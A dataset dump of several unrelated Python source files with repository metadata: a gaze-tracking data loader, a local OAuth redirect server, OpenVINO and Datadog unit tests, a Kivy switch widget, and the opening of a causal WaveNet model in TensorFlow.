# recordingNum = self.metadata['labelRecNum'][rowIndex]
# frameIndex = self.metadata['frameIndex'][rowIndex]
# if self.data_format == "V1":
# imFacePath = os.path.join(self.dataPath, '%05d/appleFace/%05d.jpg' % (recordingNum, frameIndex))
# imEyeLPath = os.path.join(self.dataPath, '%05d/appleLeftEye/%05d.jpg' % (recordingNum, frameIndex))
# imEyeRPath = os.path.join(self.dataPath, '%05d/appleRightEye/%05d.jpg' % (recordingNum, frameIndex))
# imFaceGridPath = os.path.join(self.dataPath, '%05d/faceGrid/%05d.jpg' % (recordingNum, frameIndex))
# else:
# # For new V2 format data
# imFacePath = os.path.join(self.dataPath, '%s/appleFace/%s.jpg' % (recordingNum, frameIndex))
# imEyeLPath = os.path.join(self.dataPath, '%s/appleLeftEye/%s.jpg' % (recordingNum, frameIndex))
# imEyeRPath = os.path.join(self.dataPath, '%s/appleRightEye/%s.jpg' % (recordingNum, frameIndex))
# imFaceGridPath = os.path.join(self.dataPath, '%s/faceGrid/%s.jpg' % (recordingNum, frameIndex))
# # Note: Converted from double (float64) to float (float32) as pipeline output is float in MSE calculation
# gaze = np.array([self.metadata['labelDotXCam'][rowIndex], self.metadata['labelDotYCam'][rowIndex]], np.float32)
# # V1
# # frame = np.array([self.metadata['labelRecNum'][rowIndex], self.metadata['frameIndex'][rowIndex]])
# # TODO: with new changes this becomes an array of string and makes dataloader grumpy because
# # default_collate metthod only supports primitive datatypes. To Pass strings to dataloader
# # use custom `frame_collate` method
# frame = np.array([self.metadata['labelRecNum'][rowIndex], self.metadata['frameIndex'][rowIndex]])
# # faceGrid = self.makeGrid(self.metadata['labelFaceGrid'][rowIndex, :])
# row = np.array([int(rowIndex)])
# index = np.array([int(index)])
# if self.data_loader == 'cpu':
# # Image loading, transformation and normalization happen here
# imFace = self.loadImage(imFacePath)
# imEyeL = self.loadImage(imEyeLPath)
# imEyeR = self.loadImage(imEyeRPath)
# imfaceGrid = self.loadImage(imFaceGridPath)
# # Data Augmentation: Mirroring
# # mirror data with 50% probablity
# if self.split == 'train' and random() >= 0.5:
# imFace = transforms.functional.hflip(imFace)
# imEyeR, imEyeL = transforms.functional.hflip(imEyeL), transforms.functional.hflip(imEyeR)
# imfaceGrid = transforms.functional.hflip(imfaceGrid)
# gaze = self.mirrorCoordinates * gaze
# # Data Augmentation: Random Crop, Color Jitter
# # faceGrid mustn't have these augmentations
# imFace = self.normalize_image(imFace)
# imEyeL = self.normalize_image(imEyeL)
# imEyeR = self.normalize_image(imEyeR)
# imfaceGrid = self.resize_transform(imfaceGrid)
# # to tensor
# row = torch.LongTensor([int(index)])
# # faceGrid = torch.FloatTensor(faceGrid)
# gaze = torch.FloatTensor(gaze)
# return row, imFace, imEyeL, imEyeR, imfaceGrid, gaze, index, frame
# else:
# # image loading, transformation and normalization happen in ExternalDataPipeline
# # we just pass imagePaths
# return row, imFacePath, imEyeLPath, imEyeRPath, imFaceGridPath, gaze, index, frame
# # TODO: Not in use anymore due to RC. Should eventually be removed
# def makeGrid(self, params):
# gridLen = self.gridSize[0] * self.gridSize[1]
# grid = np.zeros([gridLen, ], np.float32)
# indsY = np.array([i // self.gridSize[0] for i in range(gridLen)])
# indsX = np.array([i % self.gridSize[0] for i in range(gridLen)])
# condX = np.logical_and(indsX >= params[0], indsX < params[0] + params[2])
# condY = np.logical_and(indsY >= params[1], indsY < params[1] + params[3])
# cond = np.logical_and(condX, condY)
# grid[cond] = 1
# return grid
# # used by dali
# def __iter__(self):
# self.size = self.__len__()
# return self
# def shuffle(self):
# shuffle(self.indices)
# def __next__(self):
# rowBatch = []
# imFaceBatch = []
# imEyeLBatch = []
# imEyeRBatch = []
# imFaceGridBatch = []
# gazeBatch = []
# indexBatch = []
# frameBatch = []
# for local_index in range(self.batch_size):
# row, imFacePath, imEyeLPath, imEyeRPath, imFaceGridPath, gaze, index, frame = self.__getitem__(self.index)
# self.index = (self.index + 1) % self.__len__()
# imFace = open(imFacePath, 'rb')
# imEyeL = open(imEyeLPath, 'rb')
# imEyeR = open(imEyeRPath, 'rb')
# imFaceGrid = open(imFaceGridPath, 'rb')
# rowBatch.append(row)
# imFaceBatch.append(np.frombuffer(imFace.read(), dtype=np.uint8))
# imEyeLBatch.append(np.frombuffer(imEyeL.read(), dtype=np.uint8))
# imEyeRBatch.append(np.frombuffer(imEyeR.read(), dtype=np.uint8))
# imFaceGridBatch.append(np.frombuffer(imFaceGrid.read(), dtype=np.uint8))
# gazeBatch.append(gaze)
# indexBatch.append(index)
# frameBatch.append(frame)
# imFace.close()
# imEyeL.close()
# imEyeR.close()
# imFaceGrid.close()
# return rowBatch, imFaceBatch, imEyeLBatch, imEyeRBatch, imFaceGridBatch, gazeBatch, indexBatch, frameBatch
# # For compatibiity with Python 2
# def next(self):
# return self.__next__()
class ITrackerData(object):
def __init__(self,
dataPath,
metadata,
batch_size,
imSize,
gridSize,
split,
silent=True,
jitter=True,
color_space='YCbCr',
data_loader='cpu',
shard_id=0,
num_shards=1,
data_format='V2'):
self.dataPath = dataPath
self.metadata = metadata
self.batch_size = batch_size
self.imSize = imSize
self.gridSize = gridSize
self.color_space = color_space
self.data_loader = data_loader
self.index = 0
self.split = split
self.data_format = data_format
# ======= Sharding configuration variables ========
if num_shards > 0:
self.num_shards = num_shards
else:
raise ValueError("num_shards cannot be negative")
if shard_id >= 0 and shard_id < self.num_shards:
self.shard_id = shard_id
else:
raise ValueError(f"shard_id should be between 0 and %d i.e. 0 <= shard_id < num_shards."%(num_shards))
# ====================================================
if self.split == 'test':
mask = self.metadata['labelTest']
elif self.split == 'val':
mask = self.metadata['labelVal']
elif self.split == 'train':
mask = self.metadata['labelTrain']
elif self.split == 'all':
mask = np.ones[len(self.metadata)]
else:
raise Exception('split should be test, val or train. The value of split was: {}'.format(self.split))
self.indices = np.argwhere(mask)[:, 0]
if not silent:
print('Loaded iTracker dataset split "%s" with %d records.' % (self.split, len(self.indices)))
if self.data_loader == 'cpu':
self.normalize_image = normalize_image_transform(image_size=self.imSize, jitter=jitter, split=self.split, color_space=self.color_space)
self.resize_transform = resize_image_transform(image_size=self.imSize)
self.mirror_transform = transforms.RandomHorizontalFlip(p=1.0)
self.mirrorCoordinates = np.array([-1.0, 1.0])
def __len__(self):
return math.floor(len(self.indices)/self.num_shards)
def loadImage(self, path):
try:
im = Image.open(path).convert(self.color_space)
except OSError:
raise RuntimeError('Could not read image: ' + path)
return im
def __getitem__(self, shard_index):
# mapping for shards: shard index to absolute index
index = self.shard_id * self.__len__() + shard_index
rowIndex = self.indices[index]
recordingNum = self.metadata['labelRecNum'][rowIndex]
frameIndex = self.metadata['frameIndex'][rowIndex]
if self.data_format == "V1":
imFacePath = os.path.join(self.dataPath, '%05d/appleFace/%05d.jpg' % (recordingNum, frameIndex))
imEyeLPath = os.path.join(self.dataPath, '%05d/appleLeftEye/%05d.jpg' % (recordingNum, frameIndex))
imEyeRPath = os.path.join(self.dataPath, '%05d/appleRightEye/%05d.jpg' % (recordingNum, frameIndex))
imFaceGridPath = os.path.join(self.dataPath, '%05d/faceGrid/%05d.jpg' % (recordingNum, frameIndex))
else:
# For new V2 format data
imFacePath = os.path.join(self.dataPath, '%s/appleFace/%s.jpg' % (recordingNum, frameIndex))
imEyeLPath = os.path.join(self.dataPath, '%s/appleLeftEye/%s.jpg' % (recordingNum, frameIndex))
imEyeRPath = os.path.join(self.dataPath, '%s/appleRightEye/%s.jpg' % (recordingNum, frameIndex))
imFaceGridPath = os.path.join(self.dataPath, '%s/faceGrid/%s.jpg' % (recordingNum, frameIndex))
# Note: Converted from double (float64) to float (float32) as pipeline output is float in MSE calculation
gaze = np.array([self.metadata['labelDotXCam'][rowIndex], self.metadata['labelDotYCam'][rowIndex]], np.float32)
# frame = np.array([self.metadata['labelRecNum'][rowIndex], self.metadata['frameIndex'][rowIndex]])
# frame = np.array([self.metadata['labelRecNum'][rowIndex], self.metadata['frameIndex'][rowIndex]], np.object)
# faceGrid = self.makeGrid(self.metadata['labelFaceGrid'][rowIndex, :])
row = np.array([int(rowIndex)])
index = np.array([int(index)])
if self.data_loader == 'cpu':
# Image loading, transformation and normalization happen here
imFace = self.loadImage(imFacePath)
imEyeL = self.loadImage(imEyeLPath)
imEyeR = self.loadImage(imEyeRPath)
imfaceGrid = self.loadImage(imFaceGridPath)
# Data Augmentation: Mirroring
# mirror data with 50% probablity
if self.split == 'train' and random() >= 0.5:
imFace = transforms.functional.hflip(imFace)
imEyeR, imEyeL = transforms.functional.hflip(imEyeL), transforms.functional.hflip(imEyeR)
imfaceGrid = transforms.functional.hflip(imfaceGrid)
gaze = self.mirrorCoordinates * gaze
# Data Augmentation: Random Crop, Color Jitter
# faceGrid mustn't have these augmentations
imFace = self.normalize_image(imFace)
imEyeL = self.normalize_image(imEyeL)
imEyeR = self.normalize_image(imEyeR)
imfaceGrid = self.resize_transform(imfaceGrid)
# to tensor
row = torch.LongTensor([int(index)])
# faceGrid = torch.FloatTensor(faceGrid)
gaze = torch.FloatTensor(gaze)
return row, imFace, imEyeL, imEyeR, imfaceGrid, gaze, index
else:
# image loading, transformation and normalization happen in ExternalDataPipeline
# we just pass imagePaths
return row, imFacePath, imEyeLPath, imEyeRPath, imFaceGridPath, gaze, index
# TODO: Not in use anymore due to RC. Should eventually be removed
def makeGrid(self, params):
gridLen = self.gridSize[0] * self.gridSize[1]
grid = np.zeros([gridLen, ], np.float32)
indsY = np.array([i // self.gridSize[0] for i in range(gridLen)])
indsX = np.array([i % self.gridSize[0] for i in range(gridLen)])
condX = np.logical_and(indsX >= params[0], indsX < params[0] + params[2])
condY = np.logical_and(indsY >= params[1], indsY < params[1] + params[3])
cond = np.logical_and(condX, condY)
grid[cond] = 1
return grid
# used by dali
def __iter__(self):
self.size = self.__len__()
return self
def shuffle(self):
shuffle(self.indices)
def __next__(self):
rowBatch = []
imFaceBatch = []
imEyeLBatch = []
imEyeRBatch = []
imFaceGridBatch = []
gazeBatch = []
indexBatch = []
for local_index in range(self.batch_size):
row, imFacePath, imEyeLPath, imEyeRPath, imFaceGridPath, gaze, index = self.__getitem__(self.index)
self.index = (self.index + 1) % self.__len__()
imFace = open(imFacePath, 'rb')
imEyeL = open(imEyeLPath, 'rb')
imEyeR = open(imEyeRPath, 'rb')
imFaceGrid = open(imFaceGridPath, 'rb')
rowBatch.append(row)
imFaceBatch.append(np.frombuffer(imFace.read(), dtype=np.uint8))
imEyeLBatch.append(np.frombuffer(imEyeL.read(), dtype=np.uint8))
imEyeRBatch.append(np.frombuffer(imEyeR.read(), dtype=np.uint8))
imFaceGridBatch.append(np.frombuffer(imFaceGrid.read(), dtype=np.uint8))
gazeBatch.append(gaze)
indexBatch.append(index)
imFace.close()
imEyeL.close()
imEyeR.close()
imFaceGrid.close()
return rowBatch, imFaceBatch, imEyeLBatch, imEyeRBatch, imFaceGridBatch, gazeBatch, indexBatch
# For compatibiity with Python 2
def next(self):
return self.__next__()
def load_data(split,
dataPath,
metadata,
image_size,
grid_size,
workers,
batch_size,
verbose,
local_rank,
color_space,
data_loader,
eval_boost,
mode,
data_format):
shuffle = True if split == 'train' else False
# Enable shading here for ddp2 mode only
if mode == "ddp2":
shard_id, num_shards = local_rank[0], torch.cuda.device_count()
else:
shard_id, num_shards = 0, 1
if eval_boost:
batch_size = batch_size if split == 'train' else batch_size * 2
data = ITrackerData(dataPath,
metadata,
batch_size,
image_size,
grid_size,
split,
silent=not verbose,
jitter=True,
color_space=color_space,
data_loader=data_loader,
shard_id=shard_id,
num_shards=num_shards,
data_format=data_format)
size = len(data)
# DALI implementation would do a cross-shard shuffle
# CPU implementation would do a in-shard shuffle
if data_loader == "cpu":
loader = torch.utils.data.DataLoader(
data,
batch_size=batch_size,
shuffle=True,
num_workers=workers,
pin_memory=True,
collate_fn = custom_collate)
elif data_loader == "dali_gpu" or data_loader == "dali_cpu":
pipes = [ExternalSourcePipeline(data,
batch_size=batch_size,
image_size=image_size,
split=split,
silent=not verbose,
num_threads=8,
device_id=local_rank[0],
data_loader=data_loader,
color_space=color_space,
shuffle=True)]
# DALI automatically allocates Pinned memory whereever possible
# auto_reset=True resets the iterator after each epoch
# DALIGenericIterator has inbuilt build for all pipelines
loader = DALIGenericIterator(pipes,
['row', 'imFace', 'imEyeL', 'imEyeR', 'imFaceGrid', 'gaze', 'frame', 'indices'],
size=len(data),
fill_last_batch=False,
last_batch_padded=True, auto_reset=True)
# loader = DALIGenericIterator(pipes,
# ['row', 'imFace', 'imEyeL', 'imEyeR', 'imFaceGrid', 'gaze', 'indices'],
# size=len(data),
# fill_last_batch=False,
# last_batch_padded=True, auto_reset=True)
else:
raise ValueError(f"Invalid data_loader mode: %s"%(data_loader))
return Dataset(split, data, size, loader)
# Define the custom collate strategy for dataloader
def custom_collate(batch):
return default_collate(batch)
# def custom_collate(batch):
# new_batch = []
# frames = []
# for _batch in batch:
# new_batch.append(_batch[:-1])
# frames.append(_batch[-1])
# return default_collate(new_batch), frames
def load_all_data(path,
image_size,
grid_size,
workers,
batch_size,
verbose,
local_rank,
color_space='YCbCr',
data_loader='cpu',
eval_boost=False,
mode='none',
data_format='V2'):
print(centered_text('Loading Data'))
metadata = ITrackerMetadata(path, silent=not verbose).metadata
splits = ['train', 'val', 'test']
all_data = {
split: load_data(split,
path,
metadata,
image_size,
grid_size,
workers,
batch_size,
verbose,
local_rank,
color_space,
data_loader,
eval_boost,
mode,
data_format)
for split in splits}
return all_data
| 42.733735
| 149
| 0.570526
|
3680907130497cccd71d6433c1c77714c52df836
| 1,187
|
py
|
Python
|
redirect_server.py
|
ryotosaito/box-sync-for-python
|
2aa65b90b37a443979da834bf83fef45be540d6d
|
[
"MIT"
] | null | null | null |
redirect_server.py
|
ryotosaito/box-sync-for-python
|
2aa65b90b37a443979da834bf83fef45be540d6d
|
[
"MIT"
] | null | null | null |
redirect_server.py
|
ryotosaito/box-sync-for-python
|
2aa65b90b37a443979da834bf83fef45be540d6d
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from http.server import HTTPServer
from http.server import BaseHTTPRequestHandler
from http import HTTPStatus
from urllib import parse
code = ''
domain = '127.0.0.1'
port = 5050
url = 'http://' + domain + ':' + str(port) + '/'
class MyHandler(BaseHTTPRequestHandler):
def do_GET(self):
global code
self.send_response(HTTPStatus.OK)
self.send_header('Content-type', 'text/html')
self.end_headers()
query = parse.parse_qs(parse.urlsplit(self.path).query)
if 'code' in query:
code = query['code'][0]
self.wfile.write(b'Return to your application!')
else:
self.wfile.write(b"""
Something went wrong...<br>
Your request didn't contain "code" parameter...
""")
def log_message(self, format, *args):
return
def run(server_class=HTTPServer, handler_class=MyHandler):
server_address = (domain, port)
httpd = server_class(server_address, handler_class)
try:
httpd.handle_request()
except KeyboardInterrupt:
httpd.socket.close()
return code
if __name__ == '__main__':
print(run())
| 25.804348
| 63
| 0.624263
|
654774d5ff03784fe1fa82c06690411cb64a8fb7
| 2,847
|
py
|
Python
|
model-optimizer/unit_tests/extensions/front/tf/ComplexAbsAfterComplex_test.py
|
monroid/openvino
|
8272b3857ef5be0aaa8abbf7bd0d5d5615dc40b6
|
[
"Apache-2.0"
] | 2,406
|
2020-04-22T15:47:54.000Z
|
2022-03-31T10:27:37.000Z
|
model-optimizer/unit_tests/extensions/front/tf/ComplexAbsAfterComplex_test.py
|
thomas-yanxin/openvino
|
031e998a15ec738c64cc2379d7f30fb73087c272
|
[
"Apache-2.0"
] | 4,948
|
2020-04-22T15:12:39.000Z
|
2022-03-31T18:45:42.000Z
|
model-optimizer/unit_tests/extensions/front/tf/ComplexAbsAfterComplex_test.py
|
thomas-yanxin/openvino
|
031e998a15ec738c64cc2379d7f30fb73087c272
|
[
"Apache-2.0"
] | 991
|
2020-04-23T18:21:09.000Z
|
2022-03-31T18:40:57.000Z
|
# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import unittest
import numpy as np
from extensions.front.tf.ComplexAbsAfterComplex import ComplexAbsAfterComplex
from mo.front.common.partial_infer.utils import int64_array
from mo.utils.ir_engine.compare_graphs import compare_graphs
from unit_tests.utils.graph import build_graph
graph_node_attrs = {
'placeholder_0': {'shape': int64_array([3, 100, 100, 2]), 'type': 'Parameter', 'kind': 'op', 'op': 'Parameter'},
'placeholder_1': {'shape': int64_array([3, 100, 100, 2]), 'type': 'Parameter', 'kind': 'op', 'op': 'Parameter'},
'complex': {'kind': 'op', 'op': 'Complex'},
'complex_abs': {'kind': 'op', 'op': 'ComplexAbs'},
'relu': {'type': 'ReLU', 'kind': 'op', 'op': 'ReLU'},
'output': {'type': None, 'value': None, 'kind': 'op', 'op': 'Result'},
}
graph_edges = [
('placeholder_0', 'complex', {'in': 0}),
('placeholder_1', 'complex', {'in': 1}),
('complex', 'complex_abs', {'in': 0}),
('complex_abs', 'relu'),
('relu', 'output'),
]
ref_graph_node_attrs = {
'placeholder_0': {'shape': int64_array([3, 100, 100, 2]), 'type': 'Parameter', 'kind': 'op', 'op': 'Parameter'},
'placeholder_1': {'shape': int64_array([3, 100, 100, 2]), 'type': 'Parameter', 'kind': 'op', 'op': 'Parameter'},
'pow0_const': {
'type': 'Const', 'kind': 'op', 'op': 'Const', 'value': np.float32(2.0)
},
'pow1_const': {
'type': 'Const', 'kind': 'op', 'op': 'Const', 'value': np.float32(2.0)
},
'pow0': {'type': 'Power', 'kind': 'op', 'op': 'Pow'},
'pow1': {'type': 'Power', 'kind': 'op', 'op': 'Pow'},
'add': {'type': 'Add', 'kind': 'op', 'op': 'Add'},
'sqrt_const': {
'type': 'Const', 'kind': 'op', 'op': 'Const', 'value': np.float32(0.5)
},
'sqrt': {'type': 'Power', 'kind': 'op', 'op': 'Pow'},
'relu': {'type': 'ReLU', 'kind': 'op', 'op': 'ReLU'},
'output': {'type': None, 'value': None, 'kind': 'op', 'op': 'Result'},
}
ref_graph_edges = [
('placeholder_0', 'pow0', {'in': 0}),
('placeholder_1', 'pow1', {'in': 0}),
('pow0_const', 'pow0', {'in': 1}),
('pow1_const', 'pow1', {'in': 1}),
('pow0', 'add', {'in': 0}),
('pow1', 'add', {'in': 1}),
('add', 'sqrt', {'in': 0}),
('sqrt_const', 'sqrt', {'in': 1}),
('sqrt', 'relu'),
('relu', 'output'),
]
class ComplexAbsAfterComplexTest(unittest.TestCase):
def test_replacement(self):
graph = build_graph(nodes_attrs=graph_node_attrs, edges=graph_edges)
graph.stage = 'front'
ComplexAbsAfterComplex().find_and_replace_pattern(graph)
ref_graph = build_graph(nodes_attrs=ref_graph_node_attrs, edges=ref_graph_edges)
(flag, resp) = compare_graphs(graph, ref_graph, 'output', check_op_attrs=True)
self.assertTrue(flag, resp)
| 37.96
| 116
| 0.572181
|
6646ad1ed108db9b95d08f633cb32d82734f9546
| 6,511
|
py
|
Python
|
datadog_checks_base/tests/test_utils.py
|
remicalixte/integrations-core
|
b115e18c52820fe1a92495f538fdc14ddf83cfe1
|
[
"BSD-3-Clause"
] | 1
|
2021-03-24T13:00:14.000Z
|
2021-03-24T13:00:14.000Z
|
datadog_checks_base/tests/test_utils.py
|
remicalixte/integrations-core
|
b115e18c52820fe1a92495f538fdc14ddf83cfe1
|
[
"BSD-3-Clause"
] | null | null | null |
datadog_checks_base/tests/test_utils.py
|
remicalixte/integrations-core
|
b115e18c52820fe1a92495f538fdc14ddf83cfe1
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# (C) Datadog, Inc. 2018-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
from decimal import ROUND_HALF_DOWN
import mock
import pytest
from six import PY3
from datadog_checks.base.utils.common import ensure_bytes, ensure_unicode, pattern_filter, round_value, to_native_string
from datadog_checks.base.utils.containers import iter_unique
from datadog_checks.base.utils.limiter import Limiter
from datadog_checks.base.utils.secrets import SecretsSanitizer
class Item:
def __init__(self, name):
self.name = name
def __eq__(self, other):
return self.name == other.name
class TestPatternFilter:
def test_no_items(self):
items = []
whitelist = ['mock']
assert pattern_filter(items, whitelist=whitelist) == []
def test_no_patterns(self):
items = ['mock']
assert pattern_filter(items) is items
def test_multiple_matches_whitelist(self):
items = ['abc', 'def', 'abcdef', 'ghi']
whitelist = ['abc', 'def']
assert pattern_filter(items, whitelist=whitelist) == ['abc', 'def', 'abcdef']
def test_multiple_matches_blacklist(self):
items = ['abc', 'def', 'abcdef', 'ghi']
blacklist = ['abc', 'def']
assert pattern_filter(items, blacklist=blacklist) == ['ghi']
def test_whitelist_blacklist(self):
items = ['abc', 'def', 'abcdef', 'ghi']
whitelist = ['def']
blacklist = ['abc']
assert pattern_filter(items, whitelist=whitelist, blacklist=blacklist) == ['def']
def test_key_function(self):
items = [Item('abc'), Item('def'), Item('abcdef'), Item('ghi')]
whitelist = ['abc', 'def']
assert pattern_filter(items, whitelist=whitelist, key=lambda item: item.name) == [
Item('abc'),
Item('def'),
Item('abcdef'),
]
class TestLimiter:
def test_no_uid(self):
warning = mock.MagicMock()
limiter = Limiter("my_check", "names", 10, warning_func=warning)
for _ in range(0, 10):
assert limiter.is_reached() is False
assert limiter.get_status() == (10, 10, False)
# Reach limit
assert limiter.is_reached() is True
assert limiter.get_status() == (11, 10, True)
# Make sure warning is only sent once
assert limiter.is_reached() is True
warning.assert_called_once_with("Check %s exceeded limit of %s %s, ignoring next ones", "my_check", 10, "names")
def test_with_uid(self):
warning = mock.MagicMock()
limiter = Limiter("my_check", "names", 10, warning_func=warning)
for _ in range(0, 20):
assert limiter.is_reached("dummy1") is False
assert limiter.get_status() == (1, 10, False)
for _ in range(0, 20):
assert limiter.is_reached("dummy2") is False
assert limiter.get_status() == (2, 10, False)
warning.assert_not_called()
def test_mixed(self):
limiter = Limiter("my_check", "names", 10)
for _ in range(0, 20):
assert limiter.is_reached("dummy1") is False
assert limiter.get_status() == (1, 10, False)
for _ in range(0, 5):
assert limiter.is_reached() is False
assert limiter.get_status() == (6, 10, False)
def test_reset(self):
limiter = Limiter("my_check", "names", 10)
for _ in range(1, 20):
limiter.is_reached("dummy1")
assert limiter.get_status() == (1, 10, False)
limiter.reset()
assert limiter.get_status() == (0, 10, False)
assert limiter.is_reached("dummy1") is False
assert limiter.get_status() == (1, 10, False)
class TestRounding:
def test_round_half_up(self):
assert round_value(3.5) == 4.0
def test_round_modify_method(self):
assert round_value(3.5, rounding_method=ROUND_HALF_DOWN) == 3.0
def test_round_modify_sig_digits(self):
assert round_value(2.555, precision=2) == 2.560
assert round_value(4.2345, precision=2) == 4.23
assert round_value(4.2345, precision=3) == 4.235
class TestContainers:
def test_iter_unique(self):
custom_queries = [
{
'metric_prefix': 'database',
'tags': ['test:database'],
'query': 'SELECT thing1, thing2 FROM TABLE',
'columns': [{'name': 'database.metric', 'type': 'count'}, {'name': 'tablespace', 'type': 'tag'}],
},
{
'tags': ['test:database'],
'columns': [{'name': 'tablespace', 'type': 'tag'}, {'name': 'database.metric', 'type': 'count'}],
'query': 'SELECT thing1, thing2 FROM TABLE',
'metric_prefix': 'database',
},
]
assert len(list(iter_unique(custom_queries))) == 1
class TestBytesUnicode:
@pytest.mark.skipif(PY3, reason="Python 3 does not support explicit bytestring with special characters")
def test_ensure_bytes_py2(self):
assert ensure_bytes('éâû') == 'éâû'
assert ensure_bytes(u'éâû') == 'éâû'
def test_ensure_bytes(self):
assert ensure_bytes('qwerty') == b'qwerty'
def test_ensure_unicode(self):
assert ensure_unicode('éâû') == u'éâû'
assert ensure_unicode(u'éâû') == u'éâû'
def test_to_native_string(self):
# type: () -> None
text = u'éâû'
binary = text.encode('utf-8')
if PY3:
assert to_native_string(binary) == text
else:
assert to_native_string(binary) == binary
class TestSecretsSanitizer:
def test_default(self):
# type: () -> None
secret = 's3kr3t'
sanitizer = SecretsSanitizer()
assert sanitizer.sanitize(secret) == secret
def test_sanitize(self):
# type: () -> None
secret = 's3kr3t'
sanitizer = SecretsSanitizer()
sanitizer.register(secret)
assert all(letter == '*' for letter in sanitizer.sanitize(secret))
def test_sanitize_multiple(self):
# type: () -> None
pwd1 = 's3kr3t'
pwd2 = 'admin123'
sanitizer = SecretsSanitizer()
sanitizer.register(pwd1)
sanitizer.register(pwd2)
message = 'Could not authenticate with password {}, did you try {}?'.format(pwd1, pwd2)
sanitized = sanitizer.sanitize(message)
assert pwd1 not in sanitized
assert pwd2 not in sanitized
| 32.232673
| 120
| 0.603748
|
1fe5af9bf8bd63e082c87ac0e69e4b9cd27a9b1e
| 2,027
|
py
|
Python
|
kivyx/selection.py
|
yunus-ceyhan/kivyx
|
f4348eb8c00ad62346b827d1ab6197f8f84cde8e
|
[
"MIT"
] | 1
|
2022-03-28T07:27:32.000Z
|
2022-03-28T07:27:32.000Z
|
kivyx/selection.py
|
yunus-ceyhan/kivyx
|
f4348eb8c00ad62346b827d1ab6197f8f84cde8e
|
[
"MIT"
] | null | null | null |
kivyx/selection.py
|
yunus-ceyhan/kivyx
|
f4348eb8c00ad62346b827d1ab6197f8f84cde8e
|
[
"MIT"
] | null | null | null |
"""
<MainApp>:
XSwitch:
pos_hint: {"center_x": .5, "center_y": .5}
active: True
style: "m3"
"""
from kivyx.behavior import CircularBehavior
from kivy.clock import Clock
from kivy.lang import Builder
from kivyx.boxlayout import XBoxLayout
from kivy.properties import ColorProperty, BooleanProperty, OptionProperty
from kivy.metrics import dp
from kivy.animation import Animation
Builder.load_string("""
<XSwitch>:
size_hint: None,None
size: (dp(36),dp(16) if root.style == "m2" else dp(22))
radius: [dp(8),] if root.style == "m2" else [dp(10),]
bg_color: root.back_color
on_press: root.change_status()
padding: [0,0,0,0] if root.style == "m2" else [dp(1),0,0,0]
XWidget:
id: ic
size_hint: None,None
size: dp(20),dp(20)
bg_color: root.toggle_color
radius: [dp(180),]
pos_hint: {"center_y": .5}
""")
class XSwitch(CircularBehavior,XBoxLayout):
toogle_color = ColorProperty()
back_color = ColorProperty()
active = BooleanProperty(False)
style = OptionProperty("m2", options = ["m2","m3"])
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.toggle_color = self.card_color
self.back_color = self.disabled_color
Clock.schedule_once(self.change_status)
def change_status(self,*args):
if self.active:
anim = Animation(padding = [dp(16),0,0,0] if self.style == "m2" else [dp(15),0,0,0], duration = 0.2)
anim.start(self)
anim.bind(on_complete = self.change_color)
else:
anim = Animation(padding = [0,0,0,0] if self.style == "m2" else [dp(1),0,0,0], duration = 0.2)
anim.start(self)
anim.bind(on_complete = self.change_color)
def change_color(self,*args):
if not self.active:
self.back_color = self.disabled_color
self.active = True
else:
self.back_color = self.accent_color
self.active = False
| 30.712121
| 112
| 0.614702
|
c32cba98ebd9e0cff698158bc310d0ef3b653be1
| 9,223
|
py
|
Python
|
model_causal.py
|
ljuvela/GELP
|
6d1084aa7471530224c8f0498efcce696069ec87
|
[
"Apache-2.0"
] | 27
|
2019-07-02T19:21:32.000Z
|
2021-04-03T21:09:31.000Z
|
model_causal.py
|
ljuvela/GELP
|
6d1084aa7471530224c8f0498efcce696069ec87
|
[
"Apache-2.0"
] | 1
|
2021-04-20T03:05:17.000Z
|
2021-04-21T10:21:07.000Z
|
model_causal.py
|
ljuvela/GELP
|
6d1084aa7471530224c8f0498efcce696069ec87
|
[
"Apache-2.0"
] | 6
|
2020-08-10T01:39:41.000Z
|
2021-07-28T13:45:53.000Z
|
from __future__ import division, print_function
__author__ = "Lauri Juvela, lauri.juvela@aalto.fi"
import os
import sys
import math
import numpy as np
import tensorflow as tf
_FLOATX = tf.float32 # todo: move to lib/precision.py
def get_weight_variable(name, shape=None, initial_value=None):
if shape is None:
return tf.get_variable(name)
if initial_value is None:
initializer = tf.contrib.layers.xavier_initializer_conv2d()
W = tf.get_variable(name, shape=shape, dtype=_FLOATX, initializer=initializer)
else:
W = tf.Variable(initial_value)
return W
def get_bias_variable(name, shape=None, initializer=tf.constant_initializer(value=0.0, dtype=_FLOATX)):
return tf.get_variable(name, shape=shape, dtype=_FLOATX, initializer=initializer)
def convolution(X, W, dilation=1, causal=True):
"""
Applies 1D convolution
Args:
X: input tensor of shape (batch, timesteps, in_channels)
W: weight tensor of shape (filter_width, in_channels, out_channels)
dilation: int value for dilation
causal: bool flag for causal convolution
Returns:
Y: output tensor of shape (batch, timesteps, out_channels)
"""
if causal:
fw = tf.shape(W)[0]
pad = (fw - 1) * dilation
Y = tf.pad(X, paddings=[[0,0], [pad,0], [0,0]])
Y = tf.nn.convolution(Y, W, padding="VALID", dilation_rate=[dilation])
else:
Y = tf.nn.convolution(X, W, padding="SAME", dilation_rate=[dilation])
return Y
class WaveNet():
"""
TensorFlow WaveNet object
Initialization Args:
name: string used for variable namespacing
user is responsible for unique names if multiple models are used
residual_channels: number of channels used in the convolution layers
postnet_channels:
filter_width:
dilations: list of integers containing the dilation pattern
list length determines the number of dilated blocks used
input_channels:
causal: if True, use causal convolutions everywhere in the network
conv_block_gate: if True, use gated convolutions in the dilated blocks
conv_block_affine_out: if True, apply a 1x1 convolution in dilated blocks before the residual connection
Functions:
Members:
"""
def __init__(self,
name,
residual_channels=64,
postnet_channels=64,
filter_width=3,
dilations=[1, 2, 4, 8, 1, 2, 4, 8],
input_channels=1,
output_channels=1,
cond_channels=None,
cond_embed_dim = 64,
causal=True,
conv_block_gate=True,
conv_block_affine_out=True,
add_noise_at_each_layer=False
):
self.input_channels = input_channels
self.output_channels = output_channels
self.filter_width = filter_width
self.dilations = dilations
self.residual_channels = residual_channels
self.postnet_channels = postnet_channels
self.causal = causal
self.conv_block_gate = conv_block_gate
self.conv_block_affine_out = conv_block_affine_out
self.add_noise_at_each_layer = add_noise_at_each_layer
if cond_channels is not None:
self._use_cond = True
self.cond_embed_dim = cond_embed_dim
self.cond_channels = cond_channels
else:
self._use_cond = False
